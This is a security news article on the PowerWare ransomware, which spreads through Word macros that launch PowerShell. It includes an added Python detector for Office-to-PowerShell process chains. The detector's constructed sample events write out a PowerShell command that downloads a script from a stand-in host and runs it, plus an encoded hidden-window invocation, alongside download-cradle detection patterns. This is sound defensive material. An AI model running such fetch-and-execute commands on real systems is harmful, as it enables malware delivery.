US-based security firm Carbon Black has discovered a new
ransomware variant known as PowerWare.
The ransomware, discovered a week ago, targeted a company in
the healthcare industry.
As with all ransomware families identified this week, this
one has a twist of its own: its mode of operation has not been seen before
in other ransomware strains.
PowerWare differs from other crypto-ransomware samples in that
it is fileless, a tactic previously adopted by other malware families pushed through
prolific exploit kits such as Angler.
The PowerWare ransomware itself is written entirely in the
Windows PowerShell scripting language; it reaches victims through a combination of Word
documents, macro scripts and PowerShell commands that deliver its
payload.
PowerShell is a task automation and configuration management
framework that's included in Windows and is commonly used by systems
administrators. It has its own powerful scripting language that has been used
to create sophisticated malware in the past.
In spite of its innovative methods, the ransomware still
relies on old-school infection tactics that start with a spam email arriving in
the victim's inbox. The emails contain Word documents with malicious macros, an
increasingly common attack technique.
Once the macro is enabled, it opens cmd.exe, which in turn launches
PowerShell, the native Windows command-line framework used to manage
tasks, to download the malicious script. Running the payload through PowerShell avoids dropping a
conventional executable on disk and allows the malware to blend in with legitimate activity
on the computer.
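The chain described above (Word macro, cmd.exe, then a PowerShell download) is exactly what process-creation telemetry exposes, because each hop is a separate process with a recorded parent. The detector below is an added example written for this article, not code from Carbon Black or Palo Alto Networks. It runs over constructed Sysmon-style process-creation events (the PIDs, file paths, host name example.invalid and command lines are all invented for illustration) and, beyond the chain the article describes, also covers two variants: Office launching powershell.exe directly without cmd.exe, and an encoded command used instead of a download cradle.

```python
"""Flag the Office -> cmd.exe -> powershell.exe download chain in process-creation events.

Added example for this article, not vendor code. SAMPLE_EVENTS are CONSTRUCTED,
modelled loosely on Sysmon Event ID 1 fields; every PID, path and URL is an assumption.
"""
import re

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Download cradles commonly seen in macro-launched PowerShell one-liners.
CRADLE_PATTERNS = [re.compile(p, re.I) for p in (
    r"net\.webclient", r"downloadfile", r"downloadstring",
    r"invoke-webrequest", r"\biwr\b", r"start-bitstransfer",
)]
# Switches used to run quietly and sidestep the execution policy.
FLAG_PATTERNS = [re.compile(p, re.I) for p in (
    r"-e(p|xecutionpolicy)?\s+bypass", r"-nop(rofile)?\b", r"-noni(nteractive)?\b",
    r"-w(indowstyle)?\s+hidden", r"-e(ncodedcommand|nc|c)?\s+[A-Za-z0-9+/=]{8,}",
)]

# Constructed download command, reused for the cmd.exe and powershell.exe events below.
PS_DOWNLOAD = r'''powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "(New-Object Net.WebClient).DownloadFile('http://example.invalid/update.ps1', $env:TEMP + '\update.ps1'); & $env:TEMP\update.ps1"'''

SAMPLE_EVENTS = [
    # Scenario 1: the chain from the article. Parent PID 500 (explorer.exe) is outside the sample.
    {"pid": 1000, "ppid": 500, "image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "command_line": r'"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.doc"'},
    {"pid": 1010, "ppid": 1000, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c " + PS_DOWNLOAD},
    {"pid": 1020, "ppid": 1010, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": PS_DOWNLOAD},
    # Scenario 2: an administrator running PowerShell from a console; no alert expected.
    {"pid": 2000, "ppid": 600, "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe"},
    {"pid": 2010, "ppid": 2000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -Command "Get-Service | Where-Object Status -eq Running"'},
    # Scenario 3: a scheduled updater with a download but no Office parent; stays below threshold.
    {"pid": 3010, "ppid": 3000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -NoProfile -Command "Invoke-WebRequest -Uri https://updates.example.invalid/manifest.json -OutFile C:\ProgramData\Updater\manifest.json"'},
    # Scenario 4 (variant): Excel spawning PowerShell directly with an encoded command.
    {"pid": 4000, "ppid": 800, "image": r"C:\Program Files\Microsoft Office\Office15\EXCEL.EXE",
     "command_line": r'"C:\Program Files\Microsoft Office\Office15\EXCEL.EXE" /e "C:\Users\bob\Downloads\report.xls"'},
    {"pid": 4010, "ppid": 4000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
]


def image_name(path):
    """Lower-cased file name of an Image path, accepting either path separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(by_pid, pid, max_depth=5):
    """Return [self, parent, grandparent, ...] image names, stopping at unknown PIDs or loops."""
    chain, seen = [], set()
    event = by_pid.get(pid)
    while event is not None and event["pid"] not in seen and len(chain) < max_depth:
        seen.add(event["pid"])
        chain.append(image_name(event["image"]))
        event = by_pid.get(event["ppid"])
    return chain


def analyse(events):
    """Return one alert dict per PowerShell process that matches the chain or cradle rules."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if image_name(e["image"]) not in SHELL_IMAGES:
            continue
        chain = ancestry(by_pid, e["pid"])
        office = next((img for img in chain[1:] if img in OFFICE_IMAGES), None)
        cradles = [p.pattern for p in CRADLE_PATTERNS if p.search(e["command_line"])]
        flags = [p.pattern for p in FLAG_PATTERNS if p.search(e["command_line"])]
        if office and (cradles or flags):
            severity = "high"      # Office ancestor plus download or evasion switches
        elif office or (cradles and len(flags) >= 2):
            severity = "medium"    # Office ancestor alone, or a cradle run with evasion switches
        else:
            continue
        alerts.append({"pid": e["pid"], "severity": severity, "chain": chain,
                       "office_ancestor": office, "cradles": cradles, "flags": flags,
                       "command_line": e["command_line"]})
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] pid={alert['pid']} chain={' <- '.join(alert['chain'])}")
        print(f"    cradles={alert['cradles']} flags={alert['flags']}")
```

On a real estate the events come from Sysmon Event ID 1 (or Windows 4688 with command-line auditing and parent tracking enabled), and the thresholds are a starting point: scenario 3 shows why a download cradle on its own should not page anyone, while any Office-descended PowerShell process is worth a look even with a clean command line.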
Once the machine is compromised, PowerWare uses PowerShell to encrypt the files stored
on it.
Once everything is encrypted, a ransom note is displayed
on the victim’s screen demanding $500 in bitcoin in exchange for the key needed to
decrypt the files; the ransom, however, rises to $1,000 two weeks after
infection.
The use of macros to push malware, meanwhile, has enjoyed a resurgence
in the last six months, not only with ransomware but also with banking malware such
as Dridex. Macros, however, are disabled by default in Microsoft Office, so the victim
has to enable them before the attack can proceed.
PowerSniff, discovered by Palo Alto Networks, likewise uses macros
to launch a PowerShell instance, which then downloads shellcode that writes
the Ursnif point-of-sale malware directly into memory.
Both companies have published indicators of compromise for
the respective malware families.
Multiple hospitals have recently fallen victim to ransomware
attacks.
Attackers are not through testing the limits of what they
can do with new features in ransomware samples.